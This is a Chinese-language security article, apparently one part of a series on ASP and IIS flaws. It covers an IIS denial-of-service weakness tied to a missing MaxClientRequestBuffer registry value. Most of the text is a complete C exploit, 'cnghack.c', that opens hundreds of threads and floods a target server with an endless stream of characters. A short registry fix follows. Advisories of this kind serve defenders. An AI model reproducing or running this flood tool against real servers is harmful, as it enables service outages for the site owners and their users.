|
|
ASP漏洞分析和解决方法(5)
17 IIS web server DOS 漏洞描述: 默认情况下,IIS容易被拒绝服务攻击。如果注册表中有一个叫 "MaxClientRequestBuffer" 的键未被创建,针对这种NT系 统的攻击通常能奏效。 "MaxClientRequestBuffer" 这个键用于设置IIS允许接受的输入量。如果 "MaxClientRequestBuffer" 设置为256(bytes),则攻击者通过输入大量的字符请求IIS将被限制在256字节以内。而系统的缺省设置对此不加限制,因此,利用 下面的程序。可以很容易地对IIS server实行DOS攻击: #include #include #define MAX_THREAD 666 void cng(); char *server; char *buffer; int port; int counter = 0; int current_threads = 0; int main(int argc, char **argv) { WORD tequila; WSADATA data; int p; DWORD tid; HANDLE hThread[2000]; //This code is as is and sucks as it is. Won't exit correctly and a lot of other fun things. //That I didn't want to take the time to do. So just ctrl+c out of the code. //Load up cnghack.exe 3 times for charm. printf("CNG IIS DoS.\nMarc@eEye.com\nhttp://www.eeye.com\n\"For my beloved.\"\n"); if(argc<2){ printf("Usage: %s [server] [port]\n",argv[0]); exit(1); } buffer=malloc(17500); memset( buffer, 'A', strlen(buffer)); server=argv[1]; port=atoi(argv[2]); tequila = MAKEWORD( 1, 1 ); printf("Attempting to start winsock... "); if( (WSAStartup(tequila, &data)) !=0 ){ printf("failed to start winsock.\n"); exit(1); } else{ printf("started winsock.\n\n"); } counter = 0; for(p = 0 ; p < MAX_THREAD ; ++p ){ hThread[counter] = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) cng, ( void * )++counter, 0, &tid); } Sleep(250); while( current_threads ) Sleep(250); counter = 0; printf("Terminated Threads.\n"); while (counter < MAX_THREAD) { TerminateThread( hThread[counter], 0 ); ++counter; } WSACleanup(); return 0; } void cng() { int SockFD=0, p; struct sockaddr_in DstSAin; char GETKILLED[]="GET / HTTP/\r\n"; int die=1; printf("Entered CNG\n"); ++current_threads; DstSAin.sin_family = AF_INET; DstSAin.sin_port = htons((u_short)port); DstSAin.sin_addr.s_addr=inet_addr( server ); if((SockFD = socket(AF_INET, SOCK_STREAM, 0)) < 0){ printf("Failed to create socket\n"); --current_threads; return; } if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin))) { p=send(SockFD,GETKILLED,strlen(GETKILLED),0); printf("Step 1: %i\n", p); for(;;){ p=send(SockFD,buffer,strlen(buffer),0); printf("P: %i\n", p); //put in some code to check if send = -1 more then X times we drop the loop and exit the thread //bla bla bla i love the dirtiness of concept code. } } --current_threads; printf("Exited CNG\n"); return; } cnghack.c works by doing the following: Connects to example.com Sends: GET / HTTP/[return][buffer] Where: [return] is just an \r\n [buffer] is a never ending stream of A's 攻击结果将导致NT系统的CPU占用率达到 100% 解决方案 运行Regedt32.exe 在:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\w3svc\parameters 增加一个值: Value Name: MaxClientRequestBuffer Data Type: REG_DWORD 设置为十进制 具体数值设置为你想设定的IIS允许接受的URL最大长度。 CNNS的设置为256 |
|||||||||||||||||||